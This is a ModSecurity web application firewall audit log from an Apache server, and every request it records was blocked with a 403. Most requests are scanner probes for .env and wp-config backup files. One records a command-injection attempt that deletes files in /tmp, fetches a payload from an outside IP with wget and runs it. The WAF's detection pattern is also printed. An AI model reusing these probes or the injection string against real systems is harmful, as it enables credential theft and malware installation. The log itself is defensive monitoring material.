sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --222de964-Z-- --1a1e4529-A-- [20/Apr/2025:02:07:02 +0700] aAP0Vg6cTFSgLAHl7PpfQgAAAAc 103.236.140.4 41950 103.236.140.4 8181 --1a1e4529-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.19 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.19 X-Forwarded-Proto: http Connection: close User-Agent: Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14 Accept-Charset: utf-8 --1a1e4529-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a1e4529-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745089622898294 759 (- - -) Stopwatch2: 1745089622898294 759; combined=305, p1=266, p2=0, p3=0, p4=0, p5=38, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a1e4529-Z-- --fb37de3c-A-- [20/Apr/2025:02:51:59 +0700] aAP-33Na4dA2HllpK_P4NQAAAJc 103.236.140.4 52598 103.236.140.4 8181 --fb37de3c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.65.71.217 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.65.71.217 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --fb37de3c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fb37de3c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745092319247459 778 (- - -) Stopwatch2: 1745092319247459 778; combined=331, p1=273, p2=0, p3=0, p4=0, p5=58, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fb37de3c-Z-- --ca9edd41-A-- [20/Apr/2025:03:42:32 +0700] aAQKuFu16wJWB6g0mU_wywAAABQ 103.236.140.4 36062 103.236.140.4 8181 --ca9edd41-B-- GET /shell?cd+/tmp;rm+-rf+*;wget+31.58.51.98/jaws;sh+/tmp/jaws HTTP/1.0 Host: 127.0.0.1 X-Real-IP: 183.250.254.92 X-Forwarded-Host: 127.0.0.1 X-Forwarded-Server: 127.0.0.1 X-Forwarded-For: 183.250.254.92 X-Forwarded-Proto: http Connection: close User-Agent: Hello, world Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 --ca9edd41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca9edd41-E-- --ca9edd41-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||127.0.0.1|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:cd /tmp;rm -rf *;wget 31.58.51.98/jaws;sh /tmp/jaws: cd/tmp rm -rf * wget 31.58.51.98/jaws sh/tmp/jaws"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745095352288224 3868 (- - -) Stopwatch2: 1745095352288224 3868; combined=1652, p1=795, p2=808, p3=0, p4=0, p5=49, sr=123, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca9edd41-Z-- --81248f65-A-- [20/Apr/2025:05:33:53 +0700] aAQk0Vu16wJWB6g0mU_4igAAAA0 103.236.140.4 37730 103.236.140.4 8181 --81248f65-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 196.251.69.35 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 196.251.69.35 X-Forwarded-Proto: http Connection: close Accept: */* User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 --81248f65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81248f65-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745102033293030 871 (- - -) Stopwatch2: 1745102033293030 871; combined=382, p1=346, p2=0, p3=0, p4=0, p5=36, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81248f65-Z-- --80a86f47-A-- [20/Apr/2025:05:33:53 +0700] aAQk0Vu16wJWB6g0mU_4iwAAAA4 103.236.140.4 37736 103.236.140.4 8181 --80a86f47-B-- GET /.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 196.251.69.35 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 196.251.69.35 X-Forwarded-Proto: http Connection: close Accept: */* User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 --80a86f47-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80a86f47-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745102033942972 801 (- - -) Stopwatch2: 1745102033942972 801; combined=342, p1=307, p2=0, p3=0, p4=0, p5=35, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80a86f47-Z-- --52ceca2d-A-- [20/Apr/2025:06:36:45 +0700] aAQzjcTCDeBrh52UaHTP9wAAAI8 103.236.140.4 52382 103.236.140.4 8181 --52ceca2d-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 195.178.110.137 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 195.178.110.137 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --52ceca2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --52ceca2d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745105805838675 868 (- - -) Stopwatch2: 1745105805838675 868; combined=333, p1=284, p2=0, p3=0, p4=0, p5=49, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52ceca2d-Z-- --4d69b226-A-- [20/Apr/2025:07:08:30 +0700] aAQ6_kAzeWrUIk0gvAsucwAAAMs 103.236.140.4 48778 103.236.140.4 8181 --4d69b226-B-- GET /wp-config.php.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 65.109.55.146 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 65.109.55.146 X-Forwarded-Proto: http Connection: close Accept: */* --4d69b226-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d69b226-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745107710876301 1073 (- - -) Stopwatch2: 1745107710876301 1073; combined=280, p1=240, p2=0, p3=0, p4=0, p5=40, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d69b226-Z-- --1965c50a-A-- [20/Apr/2025:07:48:45 +0700] aAREbVu16wJWB6g0mU8mAwAAAAo 103.236.140.4 40198 103.236.140.4 8181 --1965c50a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36 Accept-Charset: utf-8 --1965c50a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1965c50a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745110125451322 991 (- - -) Stopwatch2: 1745110125451322 991; combined=479, p1=435, p2=0, p3=0, p4=0, p5=44, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1965c50a-Z-- --824fd01e-A-- [20/Apr/2025:08:23:20 +0700] aARMiFTf0pL9EQC7JDVB-QAAAFA 103.236.140.4 42018 103.236.140.4 8181 --824fd01e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.65.71.217 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.65.71.217 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --824fd01e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --824fd01e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745112200636642 756 (- - -) Stopwatch2: 1745112200636642 756; combined=308, p1=269, p2=0, p3=0, p4=0, p5=38, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --824fd01e-Z-- --5fcd6732-A-- [20/Apr/2025:09:04:27 +0700] aARWK8TCDeBrh52UaHT8SQAAAI0 103.236.140.4 54288 103.236.140.4 8181 --5fcd6732-B-- GET /.env.bak HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 103.59.160.222 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 103.59.160.222 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --5fcd6732-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5fcd6732-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745114667384881 705 (- - -) Stopwatch2: 1745114667384881 705; combined=261, p1=227, p2=0, p3=0, p4=0, p5=34, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5fcd6732-Z-- --61c91f36-A-- [20/Apr/2025:09:13:04 +0700] aARYMFTf0pL9EQC7JDVF_QAAAFI 103.236.140.4 56636 103.236.140.4 8181 --61c91f36-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 5.39.19.177 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 5.39.19.177 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --61c91f36-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --61c91f36-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745115184545974 811 (- - -) Stopwatch2: 1745115184545974 811; combined=368, p1=326, p2=0, p3=0, p4=0, p5=42, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61c91f36-Z-- --c2c4617f-A-- [20/Apr/2025:09:55:51 +0700] aARiN1Tf0pL9EQC7JDVIewAAAEY 103.236.140.4 38164 103.236.140.4 8181 --c2c4617f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.34 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.34 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; Lenovo K33a42) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36 Accept-Charset: utf-8 --c2c4617f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2c4617f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745117751328318 803 (- - -) Stopwatch2: 1745117751328318 803; combined=340, p1=297, p2=0, p3=0, p4=0, p5=42, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2c4617f-Z-- --52443a5e-A-- [20/Apr/2025:10:49:37 +0700] aARu0cTCDeBrh52UaHQWbAAAAIE 103.236.140.4 59894 103.236.140.4 8181 --52443a5e-B-- GET /.env.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 103.59.160.222 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 103.59.160.222 Accept-Encoding: gzip X-Varnish: 130716468 --52443a5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --52443a5e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745120977827174 829 (- - -) Stopwatch2: 1745120977827174 829; combined=287, p1=250, p2=0, p3=0, p4=0, p5=37, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52443a5e-Z-- --47164614-A-- [20/Apr/2025:11:17:05 +0700] aAR1QUAzeWrUIk0gvAuF2wAAANY 103.236.140.4 44796 103.236.140.4 8181 --47164614-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.84.0.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.84.0.171 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --47164614-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --47164614-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745122625880862 869 (- - -) Stopwatch2: 1745122625880862 869; combined=334, p1=294, p2=0, p3=0, p4=0, p5=40, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47164614-Z-- --4975402d-A-- [20/Apr/2025:11:17:08 +0700] aAR1RFu16wJWB6g0mU9YjwAAAAY 103.236.140.4 44870 103.236.140.4 8181 --4975402d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.84.0.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.84.0.171 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --4975402d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4975402d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745122628798734 775 (- - -) Stopwatch2: 1745122628798734 775; combined=313, p1=274, p2=0, p3=0, p4=0, p5=39, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4975402d-Z-- --402a6c28-A-- [20/Apr/2025:11:40:01 +0700] aAR6oVTf0pL9EQC7JDV8ugAAAFM 103.236.140.4 45696 103.236.140.4 8181 --402a6c28-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.17 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.17 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --402a6c28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --402a6c28-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745124001849252 701 (- - -) Stopwatch2: 1745124001849252 701; combined=258, p1=226, p2=0, p3=0, p4=0, p5=32, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --402a6c28-Z-- --3b7f7319-A-- [20/Apr/2025:11:40:25 +0700] aAR6uVu16wJWB6g0mU9lqwAAAAM 103.236.140.4 45792 103.236.140.4 8181 --3b7f7319-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.17 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.17 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --3b7f7319-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b7f7319-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745124025402584 748 (- - -) Stopwatch2: 1745124025402584 748; combined=301, p1=261, p2=0, p3=0, p4=0, p5=40, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b7f7319-Z-- --2061403f-A-- [20/Apr/2025:11:51:44 +0700] aAR9YFTf0pL9EQC7JDWEdQAAAEg 103.236.140.4 51058 103.236.140.4 8181 --2061403f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.154.252.208 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.154.252.208 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --2061403f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2061403f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745124704606050 553 (- - -) Stopwatch2: 1745124704606050 553; combined=218, p1=189, p2=0, p3=0, p4=0, p5=29, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2061403f-Z-- --9468cd7a-A-- [20/Apr/2025:11:51:46 +0700] aAR9YsTCDeBrh52UaHQ8VwAAAIs 103.236.140.4 51134 103.236.140.4 8181 --9468cd7a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.154.252.208 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.154.252.208 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --9468cd7a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9468cd7a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745124706012668 717 (- - -) Stopwatch2: 1745124706012668 717; combined=280, p1=237, p2=0, p3=0, p4=0, p5=43, sr=65, sw=0, l=0, gc=0 Producer: 